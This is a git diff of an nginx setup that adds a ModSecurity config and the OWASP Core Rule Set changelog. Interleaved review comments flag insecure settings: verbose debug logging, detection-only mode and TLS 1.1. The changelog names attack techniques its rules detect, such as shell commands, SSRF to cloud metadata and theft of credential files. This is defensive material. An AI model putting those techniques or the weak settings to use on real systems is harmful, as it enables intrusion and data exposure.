diff --git a/nginx/config/modsecurity.conf b/nginx/config/modsecurity.conf
new file mode 100644
index 00000000..6bf76131
--- /dev/null
+++ b/nginx/config/modsecurity.conf
@@ -0,0 +1,16 @@
+# /etc/nginx/modsecurity/modsecurity.conf
+Include /etc/nginx/modsecurity/owasp-crs/crs-setup.conf
+Include /etc/nginx/modsecurity/owasp-crs/rules/*.conf
+
+SecRuleEngine DetectionOnly
+SecRequestBodyAccess On
+SecResponseBodyAccess On
+SecResponseBodyMimeType text/plain text/html text/xml
+SecDataDir /var/cache/modsecurity
+SecTmpDir /tmp
+SecAuditLogType Serial
+SecAuditLog /var/log/nginx/modsec_audit.log
+SecDebugLog /var/log/nginx/modsec_debug.log
+SecDebugLogLevel 9
+SecDefaultAction "phase:1,log,auditlog,pass"
+SecDefaultAction "phase:2,log,auditlog,pass"
diff --git a/nginx/config/nginx.conf b/nginx/config/nginx.conf
index a98b0b57..938eade5 100644
--- a/nginx/config/nginx.conf
+++ b/nginx/config/nginx.conf
@@ -13,8 +13,8 @@ http {
 default_type application/octet-stream;
 # Modsecurity 설정 추가
- modsecurity on;
- modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;
+ # modsecurity on;
+ # modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;
 log_format main '$remote_addr - $remote_user [$time_local] "$request" '
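Review bot: `SecDebugLogLevel 9` near the end of the new modsecurity.conf is the most verbose level and writes the full processing trace of every transaction, request and response content included, to /var/log/nginx/modsec_debug.log; level 3 (what modsecurity.conf-recommended ships with) or 0 is appropriate outside a debugging session, and the current value is both a disk-fill and a data-leak risk for a log that is rarely access-controlled. The two `SecDefaultAction` lines are placed after the `Include` of the CRS rule files, but SecDefaultAction only applies to rules declared after it, so as written they affect no rule; either move them above the Includes or drop them, since crs-setup.conf already sets the same two defaults. No `SecAuditEngine` directive is present and the engine default is Off, so the configured `SecAuditLog` may never be written unless it is enabled elsewhere; `SecAuditEngine RelevantOnly` is the usual setting. The body-processor rules from the recommended configuration are also missing, so with `SecRequestBodyAccess On` JSON request bodies are not parsed into ARGS for the CRS rules to inspect and bodies the engine cannot parse pass through uninspected; the sketch below adds them and a comment that makes the DetectionOnly choice explicit for the next reader.
```apacheconf
# … unchanged: Include lines …

# DetectionOnly: CRS matches are logged but never blocked; switch to On after tuning.
SecRuleEngine DetectionOnly
SecRequestBodyAccess On
# Parse JSON bodies so the CRS rules see them as ARGS (from modsecurity.conf-recommended).
SecRule REQUEST_HEADERS:Content-Type "^application/json" \
     "id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON"
# Do not let a body the engine failed to parse pass uninspected.
SecRule REQBODY_ERROR "!@eq 0" \
     "id:'200002',phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2"
# … unchanged: SecResponseBodyAccess / SecResponseBodyMimeType / SecDataDir / SecTmpDir …
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^(?:5|4(?!04))"
# … unchanged: SecAuditLogType / SecAuditLog / SecDebugLog …
SecDebugLogLevel 3
# … unchanged: SecDefaultAction lines (move above the Includes or drop; crs-setup.conf sets them) …
```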
@@ -65,19 +65,19 @@ http {
 }
 }
- server {
- listen 8200;
+ # server {
+ # listen 8200;
- location / {
- proxy_pass http://hashicorp_vault:8200;
- proxy_http_version 1.1;
- proxy_set_header Host $host;
- proxy_set_header X-Real-IP $remote_addr;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-Forwarded-Host $server_name;
- proxy_set_header X-Forwarded-Proto https;
- }
- }
+ # # location / {
+ # proxy_pass http://hashicorp_vault:8200;
+ # proxy_http_version 1.1;
+ # proxy_set_header Host $host;
+ # proxy_set_header X-Real-IP $remote_addr;
+ # proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ # proxy_set_header X-Forwarded-Host $server_name;
+ # proxy_set_header X-Forwarded-Proto https;
+ # }
+ # }
 # HTTPS 서버 설정
 server {
@@ -87,8 +87,8 @@ http {
 ssl_certificate_key /etc/nginx/certs/server.key;
 ssl_protocols TLSv1.1 TLSv1.2;
- # modsecurity on;
- # modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;
+ modsecurity on;
+ modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;
 location / {
 proxy_pass http://django_node_app:8000; # Django 앱을 HTTPS로 리디렉션
@@ -99,9 +99,9 @@ http {
 proxy_cache_bypass $http_upgrade;
 }
- location /vault {
- proxy_pass http://hashicorp_vault:8200; # vault 앱을 HTTPS로 리디렉션
- proxy_set_header Host $host;
- }
+ # location /vault {
+ # proxy_pass http://hashicorp_vault:8200; # vault 앱을 HTTPS로 리디렉션
+ # proxy_set_header Host $host;
+ # }
 }
 }
\ No newline at end of file
diff --git a/nginx/config/owasp-crs/CHANGES.md b/nginx/config/owasp-crs/CHANGES.md
new file mode 100644
index 00000000..9ad99c47
--- /dev/null
+++ b/nginx/config/owasp-crs/CHANGES.md
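Review bot: The `location /` line of the disabled Vault server comes out double-commented (`# # location / {`) while every other line gets a single `# `, which reads as a slip rather than intent; and commenting out a twelve-line server block here (and the `/vault` location in the last hunk of this file) leaves dead configuration that every reader has to skip over, when the history already preserves it. If the block is expected to come back, a one-line note is clearer than the commented body, e.g. `# Vault reverse proxy (port 8200) removed; Vault is not exposed through nginx for now`. Should it be re-enabled, note that the removed block served `listen 8200` in plain text while asserting `proxy_set_header X-Forwarded-Proto https;`, so it belongs behind the TLS server rather than back here.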
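Review bot: `modsecurity on;` and `modsecurity_rules_file` now live inside the HTTPS `server` block only, and the first hunk of this file comments out the same two directives at `http` level, so any other server block in this http context (the `}` `}` context lines at the top of the previous hunk appear to close one) is no longer inspected at all; if that is intended, a comment next to the directive would stop the next reader from re-enabling the http-level copy, e.g. `# WAF enabled only on the TLS vhost; other server blocks are not inspected`. Note also that the rules file enabled here sets `SecRuleEngine DetectionOnly` (see the new modsecurity.conf in this diff), so turning the module on logs CRS matches but never blocks. The adjacent context line `ssl_protocols TLSv1.1 TLSv1.2;` is untouched by the commit but worth fixing while here: TLS 1.1 is deprecated, and `ssl_protocols TLSv1.2 TLSv1.3;` is the usual baseline.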
@@ -0,0 +1,1901 @@
+# OWASP ModSecurity Core Rule Set (CRS) CHANGES
+
+## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist
+* https://github.com/coreruleset/coreruleset/issues
+ or the CRS Google Group at
+* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project
+
+## Nightly builds
+New changelog entries are written to `.changes-pending.md`. They will be moved to the main changelog before a release.
+
+## Version 4.0.0 - 2022-06-??
+
+Important changes:
+ * feat: introduce plugin architecture for extending CRS and minimizing attack surface. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) [#2038, #2448, #2404]
+ * feat: early blocking option (Christian Folini) [#1955]
+ * feat: support for HTTP/3 (Jozef Sudolský) [#3218]
+ * feat: application exclusions and less-used functionality have been migrated to plugins. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe)
+ * feat: granular control over reporting levels in 9801xx rules (Simon Studer, Andrew Howe, Christian Folini) [#2482, #2488]
+ * feat: all formerly PCRE-only regular expressions are now compatible with Re2/Hyperscan WAF engines (Max Leske, Felipe Zipitría, Allan Boll, Franziska Bühler) [#1868, #2356, #2425, #2426, #2371, #2372]
+ * feat: new rule 920620 PL1 to explicitly detect multiple Content-Type abuse (CVE-2023-38199) (Andrea Menin) [#3237]
+ * feat: nightly packages published regularly (Felipe Zipitría) [#2207]
+ * feat: add enable_default_collections flag to not initialize collections by default (Matteo Pace) [#3141]
+ * feat: extend definition of restricted headers to include `Content-Encoding` and `Accept-Charset` by default (920450 PL1, 920451 PL2) (Walter Hop) [#2780, #2782]
+ * feat: switch to using wordnet instead of spell for finding English words in spell.sh (Max Leske) [#3242]
+ * fix: refactor and rename anomaly scoring variables and paranoia level definition (Simon Studer) [#2417]
+ * update: drop HTTP/0.9 support to resolve FP (Federico
G. Schwindt) [#1966] + +Tool changes: + * feat: extend spell.sh script with an opt-in manual list of common and partial words. (Matteo Pace) [#3273] + * feat: rework spell.sh utility to help with detection of false positives English words (Andrea Menin) [#3029] + * feat: improve usability of spell.sh utility (Max Leske) [#3238] + * feat: extend rules-check.py script to better enforce rule format in project guidelines (Ervin Hegedus) [#3113] + * feat: extend rules-check.py script to ensure that `auditLogParts` is only used in last chained rule (Ervin Hegedus) [#2609] + * feat: extend rules-check.py script to ensure that rules use `@rx` operator explicitly (Ervin Hegedus) [#2541] + * feat: extend rules-check.py script to strip comments when parsing crs-setup.conf.example (Ervin Hegedus) [#3161] + +Changes after RC1: + * feat: add consistent rule references to initialization rule comments (Andrew Howe) [#2813] + * feat: add placeholder files for new plugin architecture (Walter Hop) [#2515] + * feat: check initialization and use for all TX variables (Ervin Hegedus) [#3043] + * feat: disassemble complex regexes for 932xxx rules that were subsequently replaced by other rules (Max Leske) [#2566] + * feat: extend rules to detect keyword `time` as prefix of *nix and Windows RCE rules (rules later replaced) (Franziska Bühler) [#2819] + * feat: extend rules to detect path based XSS via new target REQUEST_FILENAME in 941xxx rules (Walter Hop) [#2894] + * feat: extend rule to detect restricted `method override` headers (Mark Zeman / KramNamez) [#3056] + * feat: improve rule file 951xxx via the use of `skipAfter` instead of variable `TX:sql_error_match` (Jozef Sudolský) [#2754] + * feat: move regexp-assemble data files to root directory (Felipe Zipitría) [#3002] + * fix: reformat several initialization rules to follow project guidelines (Ervin Hegedus) [#3157] + * fix: remove auditLogParts actions from all rules where present (Andrea Menin, Ervin Hegedüs) [#3034, #3081] + * fix: 
remove uncommon Content Types from default in `crs-setup.conf.example` (Andrea Menin) [#2768] + * fix: update diverse rules to follow new naming convention with paranoia level TX variables (Christoph Hansen) [#2937] + * fix: remove initialization rules for redundant IP reputation variables (901150, 901152) (Andrew Howe) [#2833] + * fix: initialize all variables used properly (901169) (Ervin Hegedus) [#2802] + * fix: remove rule to detect security scanner http headers (913110 PL1) (Christian Folini) [#3241] + * feat: remove ineffective anti-scanner list scanners-urls.data and associated rule (913120 PL1) (Christian Folini) [#3235] + * feat: rework restricted headers mechanism into two separate lists (920450 PL1, 920451 PL2) (Andrew Howe) [#3152] + * feat: new rule detect multiple occurences of charset keyword in content type header (920530 PL1) (Jan Gora / terjanq) [#2571] + * feat: new rule to detect unicode character bypass check for non JSON requests (920540 PL1) (Franziska Bühler, 0SPwn) [#2512] + * feat: new rule to detect # char in URIs (920610 PL1) (Karel Knibbe) [#2919] + * fix: use correct anomaly scoring variables and panaoia level tags across several rules (921170 PL1, 921220 PL4, 932220 PL2, 932331 PL3, 933211 PL3, 934101 PL1, 942362 PL2, 951100) (Christoph Hansen) [#2931] + * feat: new rules to detect HTTP parameter pollution bypasses (921210 PL3, 921220 PL4) (Christian Folini) [#2747] + * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921220 PL4, 932101 PL2, 932331 PL3, 933211 PL3, 942362 PL2) (Ervin Hegedus) [#2832] + * feat: new rule to detect range header that is now forbidden on PL3 and up (921230 PL3) (Christian Folini) [#2760] + * feat: new rule to detect mod_proxy attack (CVE-2021-40438) (921240 PL1) (Franziska Bühler) [#2818] + * feat: new rules to detecting ModSecurity body processor confusion using the `Content-Type` HTTP header (921421 PL1, 921422 PL2) (Simon Studer, Ervin Hegedus) [#2763] + * fix: 
handle false positives when detecting ModSecurity body processor confusion (921422 PL2) (Ervin Hegedus) [#2784] + * fix: remove possessive quantifiers (922110 PL1) (Felipe Zipitría) [#2989] + * feat: extended rule to detect Tomcat specific path traversal attack (930110 PL1) (Christoph Hansen) [#2915] + * feat: extend rule to detect access attempts to /tmp/ (930120 PL1, 930121 PL2) (Max Leske) [#3131] + * feat: extend rule to detect ECDSA type SSH identity files via list of sensitive *nix files (930120 PL1) (Pinaki Mondal / 0xInfection) [#2586] + * feat: extend rule to detect additional sensitive files on *nix systems (930121 PL2, 930130 PL1) (Gwendal Le Coguic / gwen001) [#2560] + * feat: new rules to detect lfi and sqli in user-agent and referer request headers (930121 PL2, 942152 PL2, 942321 PL2) (Franziska Bühler, Max Leske, Shivam Bathla) [#3102] + * fix: extend rule to detect more LFI (930121 PL2) (Felipe Zipitría) [#2791] + * feat: extend data file to include additional restricted file names (restricted-files.data, 930130 PL1) (Jitendra Patro) [#3219] + * feat: extend data file to include PrestaShop configuration file (restricted-files.data, 930130 PL1) (Jean-François Viguier) [#3192] + * feat: extend rule to detect `npm-shrinkwrap.json` to restricted-files (930130 PL1) (Esa Jokinen / oh2fih) [#2627] + * feat: extend rules to detect additional protocols in RFI attacks (931130 PL2, 934120 PL2) (Karel Knibbe) [#2572] + * feat: extend rule to detect `url:file:` schema in Java RFI attacks (931130 PL2) (Andrew Howe) [#2727] + * feat: new rule to detect path traversal attacks using URL encoded URL schemes in Java applications (931131 PL2) (Christoph Hansen) [#2902] + * feat: extend rule to detect additional *nix shell commands (931160 PL1) (Gwendal Le Coguic / gwen001) [#2563] + * feat: extend rule to detect additional entries to *nix command lists (932100 PL1, 932105 PL1) (Finn Westendorf / wfinn) [#2552] + * feat: extend rule to detect additional *nix commands 
(932100 PL1) (Felipe Zipitría) [#2676] + * feat: extend rule to detect additional *nix commands (932105 PL1) (Felipe Zipitría) [#2677] + * feat: extend rule to detect `mshta` in Windows shell commands (932110 PL1) (Somdev Sangwan / s0md3v) [#2588] + * feat: extend rule to detect additional powershell cmdlet on Windows (932120 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * feat: extend rule to detect Powershell RCEs better via new automation (932120 PL1) (Felipe Zipitría) [#2669] + * feat: new rule to detect Windows cmdlet aliases (932125 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * fix: extend rule to detect character class *nix expressions (932130 PL1) (Somdev Sangwan / s0md3v, Walter Hop) [#2594] + * feat: extend rule to detect `busybox`, `$SHELL`, and `${SHELL}` in *nix RCE attacks (932150 PL1) (Walter Hop) [#2728] + * feat: extend rule to detect c99 and printf utilities (932150 PL1) (Karel Knibbe) [#2569] + * feat: extend rule to detect `ksh` in *unix RCE attacks (932150 PL1) (Andrew Howe) [#2721] + * feat: extend rule to detect RCE attacks using compression utilities (932150 PL1) (Andrew Howe) [#2712] + * feat: extend rule to detect RCEs using base64 evasions (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: extend rule to detect RCEs using evasions quotes with `python...` commands (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: new rule to detect generalised *nix RCE (932150 PL2) (Karel Knibbe) [#2583] + * feat: extend rule to detect RCE better via automation (932160 PL1) (Felipe Zipitría) [#2662] + * fix: remove unnecessary prefixes from paths in `unix-shell.data` (932160 PL1) (Felipe Zipitría) [#2662] + * feat: extend rule to detect `expre` in unix-shell list (932161 PL2) (Felipe Zipitría) [#2667] + * feat: new rules to detect *nix commands in user-agent and referer request headers (932161 PL2, 932237 PL3) (Franziska Bühler, Max Leske, Shivam Bathla) [#3132] + * feat: use new automation to generate 
`restricted-uploads.data` from `restricted-files.data` (932180 PL1) (Max Leske) [#3282] + * feat: extend rule to detect RCE in user-agent request header (932200 PL2) (Franziska Bühler, Shivam Bathla) [#3108] + * fix: new rules to handle referer header and fix false positive (932205 PL2, 932206 PL2) (Max Leske) [#3300] + * feat: extend rule to detect quote evasion (932210 PL2) (Max Leske) [#3120] + * feat: extend rule to detect `sh` (932210 PL2) (Franziska Bühler) [#2816] + * feat: extend rule to detect SQLi via automation of keyword list updates (932210 PL2) (Felipe Zipitría) [#2801] + * fix: add word boundaries for sh in RCE rules (932230 PL1, 932250 PL1) (Max Leske) [#3186] + * fix: handle false positive against `sh` in *nix command injection attacks (932230 PL1, 932250 PL1, 932236 PL2) (Max Leske) [#3186] + * feat: move *nix command injection rule 932101, 932106 into the same range as the other *nix command injection rules (932231 PL2, 932232 PL3) (Felipe Zipitría, Max leske) [#3092] + * feat: replace *-with-params.ra files with suffix replacements (932235 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (Max Leske) [#3331] + * fix: add whitespace after keywords `mail` and `task` to solve false positives (932236 PL2) (Franziska Bühler) [#3274] + * fix: align unix-shell-upto3* files (932236 PL2) (Max Leske) [#3128] + * fix: solved false positives with creation of word boundaries for commonly used words used in *nix RCE rules (932236 PL2) (Max Leske) [#3187] + * fix: use correct anomaly scoring variable (932236 PL2) (Ervin Hegedus) [#3112] + * feat: new rule to detect *nix commands in user-agent and referer request headers (932239 PL2) (Franziska Bühler, Shivam Bathla) [#3104, #3318] + * fix: remove ARGS_NAME from target variables in (932240 PL2) (Andrea Menin) [#2960] + * fix: use correct anomaly scoring variables and panaoia level tags across for rule (932240 PL2) (Ervin Hegedus) [#2963] + * feat: replace *nix command injection rules 932150 PL1, 932151 PL1 with new 
rules for commands of less than 4 characters and commands of more than 4 characters in length respetively (932250 PL1, 932260 PL1) (Felipe Zipitría, Max leske) [#3092] + * fix: false positives by requiring specific tokens to follow commands (932250 PL1) (Max Leske) [#3186] + * feat: new rules to detect detecting *nix shell history invocations (932330 PL1, 932331 PL3) (Karel Knibbe) [#2577] + * feat: new Windows commands rules based on lolbas-project replacing 932110, 932115 (932370 PL1, 932380 PL1) (Felipe Zipitría, Franziska Bühler, Max Leske) [#3059, 3170] + * feat: extend rule to detect additional file extensions via list of executable PHP files (933110) (Jan Gora / terjanq) [#2585] + * feat: extend data file to add missing PHP config directives (php-config-directives.data, 933120 PL1) (Max Leske) [#3028] + * feat: extend rule to detect additional sensitive PHP directives (933120 PL1) (Gwendal Le Coguic / gwen001) [#2561] + * feat: extend rule to detect PHP config directives via automation of keyword list updates (933120 PL1) (Felipe Zipitría) [#2696] + * feat: extend rule to detect sensitive PHP variables better (933130 PL1) (Felipe Zipitría) [#2668] + * feat: extend data file to include additional php function names (php-function-names-933151.data, 933151 PL2) (Jitendra Patro) [#3212] + * feat: automate generation of PHP function dictionaries, revisited detection (933160 PL1, 933161 PL3, 933150 PL1, 933151 PL2) (Juan-Pablo Tosso, Christian Folini, Matteo Pace) [#3273] + * feat: extend rule to detect `document.domain` XSS (933160 PL1, 941180 PL1) (Franziska Bühler, 0SPwn) [#2567] + * feat: extend rule to detect evasions in PHP contexts with `"` (933160 PL1) (Somdev Sangwan / s0md3v) [#2596] + * feat: rearrange keywords (933160 PL1, 941390 PL1) (Karel Knibbe) [#2905] + * fix: solve ReDoS issue in rule (933161 PL3) (Andrea Menin) [#2302] + * feat: extend rule to detect `bzip2` wrapper in PHP injection attacks (933200 PL1) (Andrew Howe) [#2723] + * feat: extend 
rule to detect `ssh2.*` wrappers in PHP injection attacks (933200 PL1) (Andrew Howe) [#2731] + * feat: new rule to detct PHP injection attacks without terminating semi-colon (933211 PL3) (Karel Knibbe) [#2581] + * feat: extended rule to detect Node.js injection attacks using `require` and `child_process` (934100 PL1, 932101 PL2) (Andrea Menin) [#2893] + * feat: extend rule to detect Node.js RCE better (934100 PL1) (rektor0) [#2578] + * feat: improve transformation pipeline to detect Base64-encoded evasions (934100 PL1) (Andrew Howe) [#3203] + * feat: new rule to detect Node.js RCE detection (934101 PL2) (rektor0) [#2578] + * fix: improve js rule transformation pipelines (934101 PL1, 934130 PL1, 934169 PL1, 934131 PL2) (Andrew Howe) [#3312] + * feat: extend data file to include additional indicators (ssrf.data, 934110 PL1) (Jitendra Patro) [#3213] + * feat: extend rule to detect SSRF better (934110 PL1) (Felipe Zipitría) [#2660] + * feat: extend rule to detect additional schema and IP evasion techniques in SSRF (934120 PL2) (Felipe Zipitría, Max Leske) [#2599] + * feat: extend rule to detect octal address of AWS metadata endpoints (934120 PL2) (Karel Knibbe) [#2555] + * feat: extend rule to detect SSRF better by inspecting targets beyond just ARGS (934120 PL2) (Karel Knibbe) [#2555] + * feat: new rules to detect detection of Perl and Ruby RCE signatures in a generic way (934140 PL2, 934150 PL1) (Karel Knibbe) [#2587] + * feat: new rule to detect Node DoS attack via expressions resolving to true (934160 PL1) (Karel Knibbe) [#2917] + * fix: remove unnecessary character escape (941120 PL2) (Andrew Howe) [#2805] + * feat: disassemble complex regex fully (941160 PL1) (Felipe Zipitría) [#2701] + * feat: disassemble complex regex (941210 PL1) (Felipe Zipitría) [#3262] + * feat: extend rule to detect XSS evasions using carriage return (\r) and new line (\n) characters (941210 PL1) (oct0pus7) [#2576] + * feat: disassemble complex regex (941220 PL1) (Felipe Zipitría) [#3263] 
+ * feat: new rule to detect JavaScript methods (941390 PL1) (Franziska Bühler) [#2702] + * feat: extend rule and moved rule from PL3 to PL2 (942101 PL2) (Matteo Pace) [#2922] + * feat: extended rule to detect common SQL injection probing in path segments (942110 PL2) (Andrea Menin) [#2914] + * feat: add target REQUEST_FILENAME to rule to detect path-based SQLi attacks (942120 PL2) (Andrew Howe) [#3057] + * feat: extend rule to detect use of `collate` in SQLite injection attacks (942120 PL2) (Jan Gora / terjanq) [#2584] + * fix: extend rule to detect more SQLi (942120 PL2) (Karel Knibbe) [#2556] + * feat: extend rule to detect `glob` in list of SQLi tautologies (942130 PL2) (Franziska Bühler) [#2729] + * fix: remove unneeded TX variables (942130 PL2, 942131 PL2, 942521 PL3) (Andrea Menin) [#3293] + * feat: extend rule to detect more SQL function names (942150 PL2) (Karel Knibbe) [#2895] + * feat: extend rules to detect more SQL error messages and functions (942151 PL1, 942152 PL1, 951220 PL1, 951230 PL1, 951240 PL1) (Jitendra Patros) [#3336] + * feat: extend rule to detect additional SQL function signatures (942151 PL1) (Karel Knibbe) [#2570] + * feat: extend rule to detect `endswith`, `startswith`, `unistr`, `pg_client_encoding` and various json sql functions (942151 PL1) (Franziska Bühler) [#2874] + * feat: extend rule to detect various json functions (942151 PL1) (Franziska Bühler) [#3041] + * feat: extend rule to detect `sql_compileoption_get` in SQLite injection attacks (942152 PL1) (Andrew Howe) [#2718] + * feat: new regex-assembly file for rule (942170 PL1) (Andrea Menin) [#2939] + * feat: extend rule to detect SQL injection authentication bypasses (942180 PL2) (rekter0) [#2575] + * feat: disassemble complex regex (942200 PL2) (Franziska Bühler, Max Leske) [#2932] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942200 PL2, 942370 PL2) (Franziska Bühler, Shivam Bathla) [#3106] + * feat: improve regex-assembly file for rule 
(942210 PL2) (Andrew Howe) [#2945] + * feat: disassemble complex regex (942240 PL1) (Franziska Bühler, Max Leske) [#2938] + * feat: new regex-assembly file for rule (942280 PL1) (Andrea Menin) [#2933] + * feat: extend rule to detect additional MongoDB operators via NoSQL commands list (942290 PL1) (rekter0) [#2579] + * feat: new regex-assembly file for rule (942290 PL1) (Andrea Menin) [#2942] + * feat: improve regex-assembly format (942300 PL2) (Felipe Zipitría) [#3296] + * feat: extend rule to detect `::int` and `::bool` sql data conversions (942320 PL1) (Franziska Bühler) [#2872] + * feat: extend rule to detect `lo_get` and `::text` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Walter Hop, Shivam Bathla) [#2925] + * feat: extend rule to detect `lo_import` and `div` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Shivam Bathla) [#2916] + * feat: extend rule to detect more PostgreSQL data types (942320 PL2) (Franziska Bühler, Shivam Bathla) [#3019] + * fix: add word boundaries to keywords to solve false positives (942330 PL2) (Franziska Bühler) [#3207] + * feat: extend rule to detect SQL injection better (942340 PL2) (Karel Knibbe) [#2557] + * fix: extend rule to detect more SQLi (942340 PL2) (Jan Gora / terjanq) [#2559] + * feat: new regex-assembly file for rule (942370 PL2) (Christoph Hansen, Max Leske) [#2954] + * feat: disassemble complex chained regex (942440 PL2) (Felipe Zipitría) [#3295] + * fix: reformat rules to follow project guidelines (942440 PL2, 949959, 949159, 959059, 959159) (Ervin Hegedus) [#3206] + * fix: solve errors in regex pattern (942440 PL2) (Andrea Menin) [#3290] + * feat: extend rules to detect `current_user` and `overlay` (942470 PL1, 942480 PL2) (Franziska Bühler) [#2875] + * feat: extended rule to detect detect SQL injection attacks using headers (942480 PL2) (Paul Beckett) [#2911] + * feat: extend rule to detect newlines in overlay (942480 PL2) (Franziska Bühler, Shivam Bathla) [#3040] + * feat: new rules 
to detect SQL authentication bypasses (942520 PL2, 942521 PL2, 942522 PL2) (Jan Gora / terjanq) [#2603] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942521 PL2) (Franziska Bühler, Shivam Bathla) [#3107] + * feat: new rule to detect `';` in sqli (942530 PL3) (Franziska Bühler) [#2808] + * fix: update scoring variable (942540 PL2) (Walter Hop) [#2970] + * feat: new rule to detect MySQL scientific notation attacks (942560 PL1) (Jitendra Patro) [#3316] + * feat: extend rule to detect JAVA exploits better via java-classes.data file (944130 PL1) (Dennis Brown) [#3048] + * fix: update administrative rule ids for consistent operation (950011, 950012, 950018) (Ervin Hegedüs) [#3339] + * feat: extend data file to include additional sql error messages (sql-errors.data, 951100 PL1) (Jitendra Patro) [#3214] + * fix: handle false positive in SQL error leakage detection (951240 PL1) (Jozef Sudolský) [#3169] + * feat: extend rule to detect PHP errors better via new automation (953100 PL1) (Felipe Zipitría) [#2663] + * feat: new rules to detect PHP error leakages with high false positive rates at paranoia level 2 instead of 1 (953100 PL1, 953101 PL2) (Andrea Menin) [#3119] + * fix: ignore case of `PHP` tag in response text (953210 PL1) (Felipe Zipitría) [#2664] + * feat: extend rule to detect IIS errors via automation of pattern updates (954120 PL1) (Felipe Zipitría) [#2810] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jitendra Patro) [#3215] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jozef Sudolský) [#2687] + +Changes before RC1: + * Detect Log4j / Log4Shell (Christian Folini, Max Leske, Andrew Howe) [#2349] + * Detect Spring4Shell (Christian Folini, Andrea Menin) [#2464] + * Detect JavaScript prototype pollution (Walter Hop) [#2411] + * Detect use of common webshells by inspecting response (Jozef Sudolský, Andrea Menin) [#1962, #2039, #2116] + * 
Add phpMyAdmin exclusion rules (now a plugin) (Jozef Sudolský) [#1951] + * Add phpBB exclusion rules (now a plugin) (Jozef Sudolský) [#1893] + * Deny uploading .jsp and .jspx files (Walter Hop) [#2456] + * Detect path traversal in file upload (k4n5ha0, Franziska Bühler, Felipe Zipitría) [#2451] + * Block access to AWS cli files (Jozef Sudolský) [#2439] + * Detect /proc and /sys access attempts (Andrew Howe) [#2154] + * Detect common IP-based SSRF targets (Felipe Zipitría) [#2259] + * Detect email protocol attacks (Felipe Zipitría) [#2322] + * Detect more error based SQL injections (Jozef Sudolský) [#2429] + * Detect SQLi with 'drop' keyword (Jozef Sudolský) [#2218] + * Detect RCE attempts with uninitialized shell vars (Andrea Menin) [#2151] + * Detect more unix RCE commands (Felipe Zipitría) [#2129] + * Detect SQLi with 'if exists' (NiceYouKnow) [#2121] + * Detect sqlite system command injection (flo405, Andrea Menin, Christian Folini) [#2032] + * Include IPv6 in Host Header check (itsTheFae, Ervin Hegedus, Jozef Sudolský) [#1929] + * Block access to WEB-INF directory (Jozef Sudolský) [#2092] + * Block access to various sensitive files (Jozef Sudolský) [#1960] + * Improve SQLi detection with spaces (Manuel Spartan, Max Leske) [#2436, #2290] + * Improve SQLi detection with 'not between' (NiceYouKnow, Max Leske, Franziska Bühler) [#2115] + * Fix blind SQLi detection in rule 942160 (Franziska Bühler, Christian Folini) [#1956] + * Lower FP by moving '-->' keyword to PL2 (Paul Beckett) [#2060] + * Run libinjection XSS detector on request filename in PL2 (Andrew Howe) [#2208] + * Validate Sec-Fetch-User header (somechris) [#2020] + * Detect Krzana bot (Deepshikha Sinha) [#2432] + * Detect CensysInspect and seoscanners.net crawlers (Andrew Howe) [#2155] + * Detect burpcollaborator scanner (Amir Hosein Aliakbarian) [#2152] + * Detect QQGameHall malware (Walter Hop) [#2144] + * Detect 'httpx' scanner (Will Woodson) [#2045] + * Detect 'ecairn' crawler (Jozef Sudolský) 
[#2024] + * Detect LeakIX scanner (Jozef Sudolský) [#1961] + * Unified regexp utils to automate error-prone actions and automatically update rules from regexp sources (Max Leske) [#2149, #2223, #2423, #2495, #2489, #2473] + * Add Google OAuth2 exclusion plugin (Jozef Sudolský) [#2388] + * Validate Accept-Encoding headers (Franziska Bühler) [#2357] + * Deny access to sslvpn_websession (Jozef Sudolský) [#2338] + * Detect 'Invoke-WebRequest' command (Paul Beckett) [#2271] + * Update send-payload-pls.sh (Manuel Spartan) [#2288] + * Exclusion profiles and DOS rules have been moved from CRS to plugins (Andrew Howe) [#2469] + * IP reputation rules have been moved from CRS to plugins (Simon Studer) [#2482] + * Tests: add utility script to find rules without tests (Ervin Hegedus) [#2279] + * Add crs-rules-check tool that runs sanity checks against rules (Ervin Hegedus) [#2236] + * Tests: add utility to find longest data lengths (Ervin Hegedus) [#2277] + * Improve rule-ctl script to modify rules (Max Leske) [#2193] + * Add utility to change version numbers (Ervin Hegedus) [#2085] + * feat: new rule 934170 PL1 for PHP supporting `data:` scheme without using `//` before the content-type (Felipe Zipitría) [#3018] + * fix: add local_file scheme from python2 in 931130 and 934120 (Felipe Zipitría) [#2809] + * fix: update sql reserved words in rule 942120 (Felipe Zipitría) [#2798] + * feat: new rule 932175 PL1 detecting `alias` builtin (Felipe Zipitría) [#2796] + * feat: new rules 922100-922120 PL1 detecting attacks on multipart headers (Felipe Zipitría) [#2769] + * feat: improve and extend cmdline processor to find more evasions (Felipe Zipitría) [#2907] + * feat: new rule to detect authentication bypass via SQL injection that abuses semi-colons to end the SQL query in 942540 PL1 (Karel Knibbe) [#2904] + * fix: update various rules to consolidate use of backslashes to \x5c representation for better compatibility with known WAF engines (Andrew Howe, Max Leske) [#2335, #2345, #2375, 
#2376, #2399, #2400, #2402, #2410, #2420, #2441, #2442, #2454, #2426]
